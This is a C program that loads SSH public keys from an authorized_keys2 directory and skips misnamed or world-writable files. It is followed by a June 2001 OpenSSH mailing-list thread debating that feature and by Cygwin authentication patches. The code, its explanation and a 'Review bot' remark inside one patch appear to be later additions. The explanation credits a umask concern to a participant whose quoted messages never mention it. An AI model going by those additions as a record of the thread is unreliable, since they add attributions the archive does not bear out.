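#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

enum { MAX_KEYS = 32, MAX_LINE = 4096 };

/* Return 1 if a directory entry name may be loaded as a public key. */
int acceptable_key_name(const char *name)
{
    size_t len = strlen(name), i;
    if (len <= 4 || len > 255 || strcmp(name + len - 4, ".pub") != 0)
        return 0;
    if (name[0] == '.') return 0;       /* hidden entries, "." and ".." */
    for (i = 0; i < len; i++)           /* rejects '~', '#', ' ', '/', ... */
        if (!isalnum((unsigned char)name[i]) && !strchr("._-", name[i]))
            return 0;
    return 1;
}

/* Append the key lines of path to keys[n..] if its mode is safe; return how many. */
static int read_key_lines(const char *path, char keys[][MAX_LINE], int n)
{
    FILE *f = fopen(path, "r");
    struct stat st; char line[MAX_LINE]; int added = 0;
    if (f == NULL) return 0;
    /* regular file, not group- or world-writable: sshd's StrictModes rule, per file */
    if (fstat(fileno(f), &st) == 0 && S_ISREG(st.st_mode) && !(st.st_mode & (S_IWGRP | S_IWOTH)))
        while (n + added < MAX_KEYS && fgets(line, sizeof line, f) != NULL) {
            line[strcspn(line, "\r\n")] = '\0';
            if (line[0] != '\0' && line[0] != '#')
                strcpy(keys[n + added++], line);
        }
    fclose(f);
    return added;
}

/* Load the single file first, then the directory; return the number of key lines. */
int load_authorized_keys(const char *sshdir, char keys[][MAX_LINE])
{
    char path[4096], fpath[4096];
    struct dirent *ent; DIR *d; int n = 0;
    snprintf(path, sizeof path, "%s/authorized_keys2", sshdir);
    n += read_key_lines(path, keys, n);
    snprintf(path, sizeof path, "%s/authorized_keys2.d", sshdir);
    if ((d = opendir(path)) == NULL) return n;
    while ((ent = readdir(d)) != NULL)
        if (acceptable_key_name(ent->d_name)) {
            snprintf(fpath, sizeof fpath, "%s/%s", path, ent->d_name);
            n += read_key_lines(fpath, keys, n);
        }
    closedir(d);
    return n;
}

/* Create <sshdir>/<name> with the given text and mode; return 1 on success. */
static int put(const char *sshdir, const char *name, const char *text, mode_t mode)
{
    char p[4096]; FILE *f;
    snprintf(p, sizeof p, "%s/%s", sshdir, name);
    return (f = fopen(p, "w")) != NULL && fputs(text, f) != EOF && fclose(f) == 0 && chmod(p, mode) == 0;
}

/* Build a constructed sample layout in a fresh temp dir; fill sshdir, return 1 on success. */
int build_sample_sshdir(char *sshdir, size_t size)
{
    char tmpl[] = "/tmp/akd-exampleXXXXXX", p[4096];
    if (mkdtemp(tmpl) == NULL) return 0;
    snprintf(sshdir, size, "%s", tmpl);
    snprintf(p, sizeof p, "%s/authorized_keys2.d", sshdir);
    return mkdir(p, 0700) == 0
        && put(sshdir, "authorized_keys2", "ssh-rsa AAAACONSTRUCTED1 laptop\n", 0600)
        && put(sshdir, "authorized_keys2.d/desktop.pub", "ssh-dss AAAACONSTRUCTED2 desktop\n", 0644)
        && put(sshdir, "authorized_keys2.d/desktop.pub~", "ssh-dss STALEKEY desktop\n", 0644)     /* editor backup */
        && put(sshdir, "authorized_keys2.d/shared.pub", "ssh-rsa AAAACONSTRUCTED3 shared\n", 0666); /* world-writable */
}

/* Build the sample layout, load it and return how many key lines survived the filters. */
int sample_key_count(void)
{
    static char keys[MAX_KEYS][MAX_LINE];
    char sshdir[4096];
    return build_sample_sshdir(sshdir, sizeof sshdir) ? load_authorized_keys(sshdir, keys) : -1;
}

int main(void)
{
    printf("%d key line(s) accepted from the sample layout\n", sample_key_count());
    return 0;
}
```

Run stand-alone, the program builds the sample layout under /tmp and reports two accepted key lines: the one from authorized_keys2 and desktop.pub. desktop.pub~ fails the name filter, and shared.pub is skipped because it is world-writable, which is how the loader answers the umask problem Pekka raises: a key file created with a loose umask is ignored rather than trusted, in the same spirit as sshd's StrictModes check on the single file.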
From: drosih at rpi.edu (Garance A Drosihn)
Date: Sun, 3 Jun 2001 18:26:41 -0400
Subject: authorized_keys2 directory idea
In-Reply-To:
References:
Message-ID:

At 5:08 PM -0400 6/3/01, Rob Hagopian wrote:
>My $0.02 is that I like it, and I find it easier to keep
>track of the keys and where they came from by having a
>directory format... could we at least put the patch in
>contrib?

I'll add another $0.02 to say that I think it is useful to allow
for a directory of public keys instead of a single file.

If done, I might also suggest that ssh ignore all files in that
directory except for those which end in '.pub', just to make it
clear that the file should be the "public key" and not the private
one.

-- 
Garance Alistair Drosehn            =   gad at eclipse.acs.rpi.edu
Senior Systems Programmer           or  gad at freebsd.org
Rensselaer Polytechnic Institute    or  drosih at rpi.edu

From mugz at x-mafia.org Mon Jun 4 12:03:53 2001
From: mugz at x-mafia.org (mugz)
Date: Sun, 3 Jun 2001 22:03:53 -0400 (EDT)
Subject: another bug report
In-Reply-To: <20010603213523.A4471@folly>
Message-ID:

On Sun, 3 Jun 2001, Markus Friedl wrote:

> On Sun, Jun 03, 2001 at 12:31:48PM -0400, mugz wrote:
> >
> > OK, I know some mailing lists don't like attachments, so I did as you asked
> > and have pasted the log to the end of this message. It is the log of a
> > user logging in with secureCRT and using the "disconnect" button to exit
> > the shell:
>
> i don't see an error message in the log file.
>

Well, I still get a lot of these in the log, and without exception, it's
people using secureCRT and the "disconnect" button:

Jun 3 18:46:30 members sshd[14688]: error: session_close_by_channel: kill 14689: Operation not permitted
Jun 3 18:46:30 members sshd[14688]: error: session_close_by_channel: kill 14689: Operation not permitted

It must be something that only occurs when sshd is in daemon mode?

mugz

From deraadt at cvs.openbsd.org Mon Jun 4 13:29:05 2001
From: deraadt at cvs.openbsd.org (Theo de Raadt)
Date: Sun, 03 Jun 2001 21:29:05 -0600
Subject: authorized_keys2 directory idea
In-Reply-To: Your message of "Sun, 03 Jun 2001 17:08:15 EDT."
Message-ID: <200106040329.f543T5n24299@cvs.openbsd.org>

Incompatibility sucks.

OpenSSH is security software. A lot of you keep asking for more and
more features, and the code keeps growing and growing and growing.
Assuming that the number of lines per bug is a constant, how long
before one of these features which no one uses becomes a hole?

I think it is ridiculous how some people keep demanding change.

Sorry, but I firmly believe that change for the sake of "I like it" is
stupid.

> My $0.02 is that I like it, and I find it easier to keep track of the keys
> and where they came from by having a directory format... could we at least
> put the patch in contrib?
> -Rob
>
> On Sun, 3 Jun 2001, Markus Friedl wrote:
>
> > On Sat, Jun 02, 2001 at 11:54:24AM +0300, Pekka Savola wrote:
> > > Root would not be the only one to profit from this; you would only need to
> > > copy the pubkey file in the right dir (with a descriptive name if you
> > > like!), and authorization would work without file editing. Also, if you
> > > need to refresh just one key, you could just scp that one over, no need
> > > to edit the file either.
> >
> > i don't understand why editing a file is hard.
> > i think keeping a file in sync is simpler than
> > syncing directories, especially deleting files.
> >
> > > What do you think -- would this be useful? Bloat? Could it be considered
> > > to be merged if it was implemented?
> >
> > i don't think it's useful. ssh.com switched to a-key-per-file,
> > but openssh and the traditional ssh use a-key-per-line
> >
> > and i don't want to support 2 different ways of doing things.
> >
> > > Btw, I noticed when comparing auth-rsa.c/auth2.c that auth2.c does not
> > > print debug message:
> > > --- openssh-cvs/auth2.c Sat Jun 2 11:14:21 2001
> > > +++ openssh.fix/auth2.c Sat Jun 2 11:13:40 2001
> > > @@ -26,6 +28,8 @@
> > > if (!f) {
> > > /* Restore the privileged uid. */
> > > restore_uid();
> > > + packet_send_debug("Could not open %.900s for reading.", file);
> > > + packet_send_debug("If your home is on an NFS volume, it may need to be world-readable.");
> > > return 0;
> > > }
> > > if (options.strict_modes) {
> > >
> > > was this left out by design, or a leftover in auth-rsa.c ?
> >
> > they should be merged, and in the future, i don't
> > want to see debug messages before a user is authenticated.
> >
>

From rob at hagopian.net Mon Jun 4 14:12:52 2001
From: rob at hagopian.net (Rob Hagopian)
Date: Mon, 4 Jun 2001 00:12:52 -0400 (EDT)
Subject: authorized_keys2 directory idea
In-Reply-To: <200106040329.f543T5n24299@cvs.openbsd.org>
Message-ID:

OpenSSH changed from the ssh.com directory method... not that that's
always a bad thing, I prefer not having a separate .ssh2 directory. But a
lot of other unix utils have moved to file based rather than line based
config methods for the simple reason that a lot of people working with
these systems find it easier to manage them this way... Do you object to
/proc, pam, and SysV rc scripts as well?

And I still think that if people support it, it surely belongs in contrib
for people to use at their own risk... what else is that for?
-Rob

On Sun, 3 Jun 2001, Theo de Raadt wrote:

> Incompatibility sucks.
>
> OpenSSH is security software. A lot of you keep asking for more and
> more features, and the code keeps growing and growing and growing.
> Assuming that the number of lines per bug is a constant, how long
> before one of these features which no one uses becomes a hole?
>
> I think it is ridiculous how some people keep demanding change.
>
> Sorry, but I firmly believe that change for the sake of "I like it" is
> stupid.
>
> > My $0.02 is that I like it, and I find it easier to keep track of the keys
> > and where they came from by having a directory format... could we at least
> > put the patch in contrib?
> > -Rob
> >
> > On Sun, 3 Jun 2001, Markus Friedl wrote:
> >
> > > On Sat, Jun 02, 2001 at 11:54:24AM +0300, Pekka Savola wrote:
> > > > Root would not be the only one to profit from this; you would only need to
> > > > copy the pubkey file in the right dir (with a descriptive name if you
> > > > like!), and authorization would work without file editing. Also, if you
> > > > need to refresh just one key, you could just scp that one over, no need
> > > > to edit the file either.
> > >
> > > i don't understand why editing a file is hard.
> > > i think keeping a file in sync is simpler than
> > > syncing directories, especially deleting files.
> > >
> > > > What do you think -- would this be useful? Bloat? Could it be considered
> > > > to be merged if it was implemented?
> > >
> > > i don't think it's useful. ssh.com switched to a-key-per-file,
> > > but openssh and the traditional ssh use a-key-per-line
> > >
> > > and i don't want to support 2 different ways of doing things.
> > >
> > > > Btw, I noticed when comparing auth-rsa.c/auth2.c that auth2.c does not
> > > > print debug message:
> > > > --- openssh-cvs/auth2.c Sat Jun 2 11:14:21 2001
> > > > +++ openssh.fix/auth2.c Sat Jun 2 11:13:40 2001
> > > > @@ -26,6 +28,8 @@
> > > > if (!f) {
> > > > /* Restore the privileged uid. */
> > > > restore_uid();
> > > > + packet_send_debug("Could not open %.900s for reading.", file);
> > > > + packet_send_debug("If your home is on an NFS volume, it may need to be world-readable.");
> > > > return 0;
> > > > }
> > > > if (options.strict_modes) {
> > > >
> > > > was this left out by design, or a leftover in auth-rsa.c ?
> > >
> > > they should be merged, and in the future, i don't
> > > want to see debug messages before a user is authenticated.
> > >
> >
>

From deraadt at cvs.openbsd.org Mon Jun 4 14:25:28 2001
From: deraadt at cvs.openbsd.org (Theo de Raadt)
Date: Sun, 03 Jun 2001 22:25:28 -0600
Subject: authorized_keys2 directory idea
In-Reply-To: Your message of "Mon, 04 Jun 2001 00:12:52 EDT."
Message-ID: <200106040425.f544PSn29474@cvs.openbsd.org>

> OpenSSH changed from the ssh.com directory method...

You don't know your history.

From mouring at etoh.eviladmin.org Mon Jun 4 14:13:23 2001
From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org)
Date: Sun, 3 Jun 2001 23:13:23 -0500 (CDT)
Subject: authorized_keys2 directory idea
In-Reply-To:
Message-ID:

On Mon, 4 Jun 2001, Rob Hagopian wrote:

> OpenSSH changed from the ssh.com directory method... not that that's
> always a bad thing, I prefer not having a separate .ssh2 directory. But a
> lot of other unix utils have moved to file based rather than line based

No.. We did not. ssh.com decided not to use their old single file
authorized_keys. As for which we should follow. I personally don't care.
It's no harder to me to manage it as a single file or as multiple little
files. And the arguments I've seen really do not improve the odds of us
changing it.

> config methods for the simple reason that a lot of people working with
> these systems find it easier to manage them this way... Do you object to
> /proc, pam, and SysV rc scripts as well?
>

I have a massive objection to /proc and to a lesser extent pam.. But that is
neither here nor there. =)

> And I still think that if people support it, it surely belongs in contrib
> for people to use at their own risk... what else is that for?
> -Rob
>

I doubt Theo ever has had problems with contrib/ code. It's core
software that we are referring to.

- Ben

From rob at hagopian.net Mon Jun 4 14:34:18 2001
From: rob at hagopian.net (Rob Hagopian)
Date: Mon, 4 Jun 2001 00:34:18 -0400 (EDT)
Subject: authorized_keys2 directory idea
In-Reply-To:
Message-ID:

On Sun, 3 Jun 2001 mouring at etoh.eviladmin.org wrote:

> On Mon, 4 Jun 2001, Rob Hagopian wrote:
>
> > OpenSSH changed from the ssh.com directory method... not that that's
> > always a bad thing, I prefer not having a separate .ssh2 directory. But a
> > lot of other unix utils have moved to file based rather than line based
>
> No.. We did not. ssh.com decided not to use their old single file
> authorized_keys. As for which we should follow, I personally don't care.
> It's no harder for me to manage it as a single file or as multiple little
> files. And the arguments I've seen really do not improve the odds of us
> changing it.

But ssh.com v2 was around before OpenSSH... they fixed a lot of things
from v1 to v2, I liked that one and was disappointed to see openssh revert
back...

> > And I still think that if people support it, it surely belongs in contrib
> > for people to use at their own risk... what else is that for?
> > -Rob
> >
>
> I doubt Theo ever has had problems with contrib/ code. It's core
> software that we are referring to.

My suggestion was only to put it into /contrib... is that OK then?
-Rob

From deraadt at cvs.openbsd.org Mon Jun 4 14:37:33 2001
From: deraadt at cvs.openbsd.org (Theo de Raadt)
Date: Sun, 03 Jun 2001 22:37:33 -0600
Subject: authorized_keys2 directory idea
In-Reply-To: Your message of "Mon, 04 Jun 2001 00:34:18 EDT."
Message-ID: <200106040437.f544bXn04870@cvs.openbsd.org>

> On Sun, 3 Jun 2001 mouring at etoh.eviladmin.org wrote:
>
> > On Mon, 4 Jun 2001, Rob Hagopian wrote:
> >
> > > OpenSSH changed from the ssh.com directory method... not that that's
> > > always a bad thing, I prefer not having a separate .ssh2 directory. But a
> > > lot of other unix utils have moved to file based rather than line based
> >
> > No.. We did not. ssh.com decided not to use their old single file
> > authorized_keys. As for which we should follow, I personally don't care.
> > It's no harder for me to manage it as a single file or as multiple little
> > files. And the arguments I've seen really do not improve the odds of us
> > changing it.
>
> But ssh.com v2 was around before OpenSSH... they fixed a lot of things
> from v1 to v2, I liked that one and was disappointed to see openssh revert
> back...

We did not revert back. And just because they made a decision does not
make it the right choice automatically.

From deraadt at cvs.openbsd.org Mon Jun 4 14:38:23 2001
From: deraadt at cvs.openbsd.org (Theo de Raadt)
Date: Sun, 03 Jun 2001 22:38:23 -0600
Subject: authorized_keys2 directory idea
In-Reply-To: Your message of "Mon, 04 Jun 2001 00:34:18 EDT."
Message-ID: <200106040438.f544cNn25533@cvs.openbsd.org>

> My suggestion was only to put it into /contrib... is that OK then?

Oh, that's a great idea. And after a while, we'll have hundreds of
incompatible versions for Markus to debug when you guys send in
incomplete bug reports.

From deraadt at cvs.openbsd.org Mon Jun 4 14:44:39 2001
From: deraadt at cvs.openbsd.org (Theo de Raadt)
Date: Sun, 03 Jun 2001 22:44:39 -0600
Subject: authorized_keys2 directory idea
In-Reply-To: Your message of "Sun, 03 Jun 2001 22:38:23 MDT." <200106040438.f544cNn25533@cvs.openbsd.org>
Message-ID: <200106040444.f544idn21197@cvs.openbsd.org>

> > My suggestion was only to put it into /contrib... is that OK then?
>
> Oh, that's a great idea. And after a while, we'll have hundreds of
> incompatible versions for Markus to debug when you guys send in
> incomplete bug reports.

I want you all to think about this carefully.

We make our software completely free so that you guys can tweak it.
All you want.

But in our own distribution, it's kind of scary when lots of tweaks
happen. It can impact developer effort VERY SIGNIFICANTLY when people
run local modifications.

A Linux vendor shipped ssh with modifications that broke interop with
various older ones. It took effort to figure out what was going on. It
took effort to convince them to alert their user base. It wasted time.

I firmly believe that contrib directories do too.

For years I have been saying that "buttons are bad"...

From rob at hagopian.net Mon Jun 4 14:50:51 2001
From: rob at hagopian.net (Rob Hagopian)
Date: Mon, 4 Jun 2001 00:50:51 -0400 (EDT)
Subject: authorized_keys2 directory idea
In-Reply-To: <200106040438.f544cNn25533@cvs.openbsd.org>
Message-ID:

There is a whopping one patch (chroot.diff) in contrib that is not system
specific; I think we're a far cry from hundreds. If people want the feature
and a patch is circulated, people may apply it and never even mention it.
Patches accepted for contrib could be forced to add a tag to the version
line (similar to apache modules) so a developer knows exactly what they're
up against if someone reports bugs. (I could even foresee a flag in config
to reject connections to/from patched ssh distributions for the really
paranoid...) Would that alleviate some of your concern?
-Rob

On Sun, 3 Jun 2001, Theo de Raadt wrote:

> > My suggestion was only to put it into /contrib... is that OK then?
>
> Oh, that's a great idea. And after a while, we'll have hundreds of
> incompatible versions for Markus to debug when you guys send in
> incomplete bug reports.
>

From markus.friedl at informatik.uni-erlangen.de Mon Jun 4 18:13:56 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Mon, 4 Jun 2001 10:13:56 +0200
Subject: authorized_keys2 directory idea
In-Reply-To: ; from rob@hagopian.net on Mon, Jun 04, 2001 at 12:12:52AM -0400
References: <200106040329.f543T5n24299@cvs.openbsd.org>
Message-ID: <20010604101356.A29589@folly>

On Mon, Jun 04, 2001 at 12:12:52AM -0400, Rob Hagopian wrote:
> OpenSSH changed from the ssh.com directory method...

wrong.

> not that that's
> always a bad thing, I prefer not having a separate .ssh2 directory.

they switched, not we.

> But a
> lot of other unix utils have moved to file based rather than line based
> config methods for the simple reason that a lot of people working with
> these systems find it easier to manage them this way... Do you object to
> /proc, pam, and SysV rc scripts as well?

yes :)

> And I still think that if people support it, it surely belongs in contrib
> for people to use at their own risk... what else is that for?

you have to maintain things in contrib as well, and if we ship hundreds
of contrib patches it's hard to say this and that is openssh's behaviour.

-m

From markus.friedl at informatik.uni-erlangen.de Mon Jun 4 18:20:59 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Mon, 4 Jun 2001 10:20:59 +0200
Subject: authorized_keys2 directory idea
In-Reply-To: ; from rob@hagopian.net on Mon, Jun 04, 2001 at 12:34:18AM -0400
References:
Message-ID: <20010604102059.B29589@folly>

On Mon, Jun 04, 2001 at 12:34:18AM -0400, Rob Hagopian wrote:
> On Sun, 3 Jun 2001 mouring at etoh.eviladmin.org wrote:
>
> > On Mon, 4 Jun 2001, Rob Hagopian wrote:
> >
> > > OpenSSH changed from the ssh.com directory method... not that that's
> > > always a bad thing, I prefer not having a separate .ssh2 directory. But a
> > > lot of other unix utils have moved to file based rather than line based
> >
> > No.. We did not. ssh.com decided not to use their old single file
> > authorized_keys. As for which we should follow, I personally don't care.
> > It's no harder for me to manage it as a single file or as multiple little
> > files. And the arguments I've seen really do not improve the odds of us
> > changing it.
>
> But ssh.com v2 was around before OpenSSH... they fixed a lot of things
> from v1 to v2, I liked that one and was disappointed to see openssh revert
> back...

i did not revert from their version.

openssh is based on 1.2.12 and we improved 1.2.12.

i never touched ssh.com's v2, because it's not free software.

many people refused to switch to ssh.com's v2, not only because of
the restrictive licence, but because all the configuration changed.

remember, most of the ssh users are still v1 users.

i'm not going to do this. and i won't support 10 different
ways of specifying keys. this is openssh and not perl.

moreover, i don't see much benefit for directories over files.

> My suggestion was only to put it into /contrib... is that OK then?

depends on the size of the patch. but if we have it in contrib,
then ppl will start to expect this from core-openssh.

-m

From jason at shalott.net Mon Jun 4 18:23:15 2001
From: jason at shalott.net (Jason Stone)
Date: Mon, 4 Jun 2001 01:23:15 -0700 (PDT)
Subject: authorized_keys2 directory idea
In-Reply-To: <200106040329.f543T5n24299@cvs.openbsd.org>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> Incompatibility sucks.
>
> OpenSSH is security software. A lot of you keep asking for more and
> more features, and the code keeps growing and growing and growing.
> Assuming that the number of lines per bug is a constant, how long
> before one of these features which no one uses becomes a hole?
>
> I think it is ridiculous how some people keep demanding change.
>
> Sorry, but I firmly believe that change for the sake of "I like it" is
> stupid.

I agree. However, taking such a stand brings with it a risk of
pseudo-forking. You say you won't take this patch because the feature is
unnecessary bloat. The patch writer says okay, and just rolls it in
himself on all his boxes. He also posts it on his website, and all the
other people who liked the idea download it and roll it into their local
installations.

Now bug reports start coming in, and incompatibilities start creeping in,
and if neither the bug reporter nor the developers realize that the
version in question has such an "un-authorized" patch, confusion will
result.

How many patches are already in this state? SecurID? SRP? Some sftp
chroot thing? Others? Again, I don't disagree with your statement, but
the resultant risk should also be considered.

-Jason

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: See https://private.idealab.com/public/jason/jason.gpg

iD8DBQE7G0V2swXMWWtptckRAvbrAJ4lST/reVBwdWFnUzWkPy/MiImmZACgxys3
BcDSNhpiXsSlSvjBx6TjS7M=
=BdQE
-----END PGP SIGNATURE-----

From deraadt at cvs.openbsd.org Mon Jun 4 18:28:57 2001
From: deraadt at cvs.openbsd.org (Theo de Raadt)
Date: Mon, 04 Jun 2001 02:28:57 -0600
Subject: authorized_keys2 directory idea
In-Reply-To: Your message of "Mon, 04 Jun 2001 01:23:15 PDT."
Message-ID: <200106040828.f548SvV20544@cvs.openbsd.org>

> I agree. However, taking such a stand brings with it a risk of
> pseudo-forking. You say you won't take this patch because the feature is
> unnecessary bloat. The patch writer says okay, and just rolls it in
> himself on all his boxes. He also posts it on his website, and all the
> other people who liked the idea download it and roll it into their local
> installations.

By all means. It's free software. Go make a version that is incompatible
with all the various SSH books. Hang yourself.

Fact is, Silverman's book clearly describes how OpenSSH works now. You
want us to change it. Get real. This isn't even a smart conversation, a
smart idea, it's just stupid and wasting time.

> Now bug reports start coming in, and incompatibilities start creeping in,
> and if neither the bug reporter nor the developers realize that the
> version in question has such an "un-authorized" patch, confusion will
> result.

Yes, and Markus will simply ignore those people.

> How many patches are already in this state? SecurID? SRP? Some sftp
> chroot thing? Others? Again, I don't disagree with your statement, but
> the resultant risk should also be considered.

What you have stated is precisely what we are trying to avoid. That is
why you will not get me supporting all these "buttons". I think we
should not distribute them. If someone finds one, and uses it, they are
on their own. If they report a problem and are using some tweak, I think
Markus and us other main OpenSSH developers should ignore those requests,
and instead forward them to people like you. Then you will get a taste
of how retarded variations like that are.

From simon at sxw.org.uk Mon Jun 4 20:08:47 2001
From: simon at sxw.org.uk (Simon Wilkinson)
Date: Mon, 4 Jun 2001 11:08:47 +0100
Subject: GSSAPI patch
Message-ID: <01060411084701.05111@loki.dcs.ed.ac.uk>

As much as I hate to raise the question of another large contributed
patch, given recent traffic, what are the chances of my patch for GSSAPI
authentication making it into the tree? It's now been widely reviewed,
and seems to be seeing a fair bit of use. There is support for multiple
GSSAPI mechanisms.

I'm happy to adapt the patch as necessary to get it included - either
against the portable tree, or against the OpenBSD tree.

Cheers,

Simon.

--
Simon Wilkinson
http://www.sxw.org.uk

From vinschen at redhat.com Mon Jun 4 20:16:23 2001
From: vinschen at redhat.com (Corinna Vinschen)
Date: Mon, 4 Jun 2001 12:16:23 +0200
Subject: [PATCH]: Drop the use of `check_nt_auth'.
In-Reply-To: <20010523161648.S10118@cygbert.vinschen.de>; from vinschen@redhat.com on Wed, May 23, 2001 at 04:16:48PM +0200
References: <20010523114532.R10118@cygbert.vinschen.de> <20010523161648.S10118@cygbert.vinschen.de>
Message-ID: <20010604121623.L595@cygbert.vinschen.de>

On Wed, May 23, 2001 at 04:16:48PM +0200, Corinna Vinschen wrote:
> On Wed, May 23, 2001 at 09:29:43PM +1000, Damien Miller wrote:
> > On Wed, 23 May 2001, Corinna Vinschen wrote:
> >
> > > Hi,
> > >
> > > the following patch removes some of the Cygwin specific code from
> > > OpenSSH.
> > >
> > > Since Cygwin is able to change the user context on NT/W2K even without
> > > a password since the new Cygwin version 1.3.2, there's no need anymore
> > > to allow changing the user context only if the sshd user is the same
> > > user as the one which logs in or when a password is given.
> > >
> > > For that reason the whole function `check_nt_auth' and all code which
> > > uses it, is completely dropped in the following patch.
> >
> > Could you add a configure test to ensure that the support for this
> > extension is available in the version of Cygwin that the user is
> > compiling against?
>
> Hmm, yes, but...
>
> would it be better to let the check_nt_auth functionality in but
> additionally check for the Cygwin version in the function
> to return an appropriate value (Cygwin >= 1.3.2 ==> return TRUE),
> perhaps?

Ok, I changed my patch to accommodate different abilities of different
Cygwin versions. Instead of completely eliminating the check, it now
tests for the Cygwin version as well as for the setting in Cygwin which
is responsible for that feature.
Corinna Index: openbsd-compat/bsd-cygwin_util.c =================================================================== RCS file: /cvs/openssh_cvs/openbsd-compat/bsd-cygwin_util.c,v retrieving revision 1.4 diff -u -p -r1.4 bsd-cygwin_util.c --- openbsd-compat/bsd-cygwin_util.c 2001/04/13 14:28:42 1.4 +++ openbsd-compat/bsd-cygwin_util.c 2001/06/04 10:05:35 @@ -21,10 +21,14 @@ RCSID("$Id: bsd-cygwin_util.c,v 1.4 2001 #include #include +#include #include #include #define is_winnt (GetVersion() < 0x80000000) +#define ntsec_on(c) ((c) && strstr((c),"ntsec") && !strstr((c),"nontsec")) +#define ntea_on(c) ((c) && strstr((c),"ntea") && !strstr((c),"nontea")) + #if defined(open) && open == binary_open # undef open #endif @@ -61,12 +65,34 @@ int check_nt_auth(int pwd_authenticated, * context on NT systems is the password authentication. So * we deny all requsts for changing the user context if another * authentication method is used. - * This may change in future when a special openssh - * subauthentication package is available. + * + * This doesn't apply to Cygwin versions >= 1.3.2 anymore which + * uses the undocumented NtCreateToken() call to create a user + * token if the process has the appropriate privileges and if + * CYGWIN ntsec setting is on. */ - if (is_winnt && !pwd_authenticated && geteuid() != uid) - return 0; - + static int has_create_token = -1; + + if (is_winnt) { + if (has_create_token < 0) { + struct utsname uts; + int major_high = 0, major_low = 0, minor = 0; + char *cygwin = getenv("CYGWIN"); + + has_create_token = 0; + if (ntsec_on(cygwin) && !uname(&uts)) { + sscanf(uts.release, "%d.%d.%d", + &major_high, &major_low, &minor); + if (major_high > 1 || + (major_high == 1 && (major_low > 3 || + (major_low == 3 && minor >= 2)))) + has_create_token = 1; + } + } + if (has_create_token < 1 && + !pwd_authenticated && geteuid() != uid) + return 0; + } return 1; } 
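Review bot: the version probe in check_nt_auth() calls sscanf(uts.release, "%d.%d.%d", ...) without checking how many fields it converted; because major_high, major_low and minor are pre-initialised to 0, an unexpected release string fails closed (has_create_token stays 0 and the old password-or-same-uid rule applies), but that is an accident of the initialisers rather than a stated decision, so make it explicit, e.g. `if (ntsec_on(cygwin) && !uname(&uts) && sscanf(uts.release, "%d.%d.%d", &major_high, &major_low, &minor) == 3 && ...)`. The comment block above the new code should also say that the answer is cached in the static has_create_token, so the CYGWIN variable and the Cygwin version are consulted once for the life of the process rather than on every authentication.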
@@ -82,12 +108,9 @@ int check_ntsec(const char *filename) return 0; /* Evaluate current CYGWIN settings. */ - if ((cygwin = getenv("CYGWIN")) != NULL) { - if (strstr(cygwin, "ntea") && !strstr(cygwin, "nontea")) - allow_ntea = 1; - if (strstr(cygwin, "ntsec") && !strstr(cygwin, "nontsec")) - allow_ntsec = 1; - } + cygwin = getenv("CYGWIN"); + allow_ntea = ntea_on(cygwin); + allow_ntsec = ntsec_on(cygwin); /* * `ntea' is an emulation of POSIX attributes. It doesn't support
--
Corinna Vinschen
Cygwin Developer
Red Hat, Inc.
mailto:vinschen at redhat.com

From ruf at tik.ee.ethz.ch Mon Jun 4 20:24:24 2001
From: ruf at tik.ee.ethz.ch (Lukas Ruf)
Date: Mon, 4 Jun 2001 12:24:24 +0200
Subject: authorizedkeys2 for a DHCP based client
Message-ID: <20010604122424.A17990@tik.ee.ethz.ch>

Dear all,

My Problem: I cannot get authorizedkeys2 working such that I do not need
to supply a password.

My Configuration:
A Linux server with OpenSSH2.9p1 and a fixed IP-Address.
A Linux client with OpenSSH2.9p1, DHCP based, so altering names, but
the hostname is set not to be adjusted to the DHCP-address. So, the
canonical hostname is not the same as the one which is submitted by
ssh.

My question:
Does anyone know how to solve such a problem -- reading the man
pages could not lead me to the solution.

Thanks in advance for any help!

Lukas
--
Lukas Ruf                  Swiss Federal Institute of Technology
Office: ETZ-G61.2          Computer Engineering and
Phone: +41/1/632 7312      Networks Laboratory (TIK)
Fax: +41/1/632 1035        ETH Zentrum
PGP 2.6: ID D20BA2ED;      Gloriastr. 35
Fingerprint 6323 B9BC 9C8E 6563 B477 BADD FEA6 E6B7   CH-8092 Zurich

From vinschen at redhat.com Mon Jun 4 20:25:54 2001
From: vinschen at redhat.com (Corinna Vinschen)
Date: Mon, 4 Jun 2001 12:25:54 +0200
Subject: [PATCH]: Add check_ntsec to ownership/mode tests
Message-ID: <20010604122554.M595@cygbert.vinschen.de>

Hi,

I have added calls to `check_ntsec()' to the code which checks for the
ownership and modes of identity files and directories. As you might know,
check_ntsec() tests if owner/modes are supported by the OS (9x/ME=no,
NT/W2K=yes), the filesystem (FAT/FAT32=no, NTFS=yes) and the current
Cygwin settings (ntea/ntsec).

Corinna

Index: auth-rhosts.c =================================================================== RCS file: /cvs/openssh_cvs/auth-rhosts.c,v retrieving revision 1.17 diff -u -p -r1.17 auth-rhosts.c --- auth-rhosts.c 2001/04/12 23:34:35 1.17 +++ auth-rhosts.c 2001/06/04 10:05:34 @@ -228,6 +228,9 @@ auth_rhosts2(struct passwd *pw, const ch pw->pw_name, pw->pw_dir); return 0; } +#ifdef HAVE_CYGWIN + if (check_ntsec(pw->pw_dir)) +#endif if (options.strict_modes && ((st.st_uid != 0 && st.st_uid != pw->pw_uid) || (st.st_mode & 022) != 0)) {
Index: auth-rsa.c =================================================================== RCS file: /cvs/openssh_cvs/auth-rsa.c,v retrieving revision 1.31 diff -u -p -r1.31 auth-rsa.c --- auth-rsa.c 2001/04/08 18:27:01 1.31 +++ auth-rsa.c 2001/06/04 10:05:34 @@ -156,6 +156,9 @@ auth_rsa(struct passwd *pw, BIGNUM *clie packet_send_debug("If your home is on an NFS volume, it may need to be world-readable."); return 0; } +#ifdef HAVE_CYGWIN + if (check_ntsec(file)) +#endif if (options.strict_modes) { int fail = 0; char buf[1024];
Index: auth2.c =================================================================== RCS file: /cvs/openssh_cvs/auth2.c,v retrieving revision 1.59 diff -u -p -r1.59 auth2.c --- auth2.c 2001/04/25 12:44:15 1.59 +++ auth2.c 2001/06/04 10:05:35
